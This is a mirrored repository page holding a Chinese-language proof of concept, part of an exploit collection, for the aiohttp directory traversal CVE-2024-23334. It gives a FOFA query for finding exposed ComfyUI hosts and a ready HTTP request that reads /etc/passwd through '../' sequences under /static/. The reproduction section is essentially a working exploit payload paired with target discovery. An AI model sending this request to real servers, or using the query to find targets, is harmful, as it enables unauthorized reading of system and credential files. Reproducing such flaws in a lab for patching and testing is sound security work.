crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:54:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md

32 lines
1.5 KiB
Markdown
Raw Permalink Normal View History

20250402 update
2025-04-02 22:36:18 +08:00
# python aiohttp插件存在目录遍历漏洞(CVE-2024-23334)
# 一、漏洞简介
aiohttp是一个用于异步网络编程的Python库支持客户端和服务器端的网络通信。它利用Python的asyncio库来实现异步IO操作这意味着它可以处理大量并发网络连接而不会导致线程阻塞或性能下降。aiohttp常用于需要高性能网络通信的应用程序如高频交易平台、大规模并发API服务等。aiohttp 存在目录遍历漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
# 二、影响版本
+ aiohttp
# 三、资产测绘
+ fofa`title=="ComfyUI""`
+ 特征
![1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c.png](./img/SDWMxOF8-pVDuhg2/1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c-685432.png)![1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7.png](./img/SDWMxOF8-pVDuhg2/1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7-373275.png)
# 四、漏洞复现
```plain
GET /static/../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```
![1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2.png](./img/SDWMxOF8-pVDuhg2/1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2-977848.png)
> 更新: 2024-09-05 23:27:24
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zaatbgfawgop0f6e>
Reference in New Issue Copy Permalink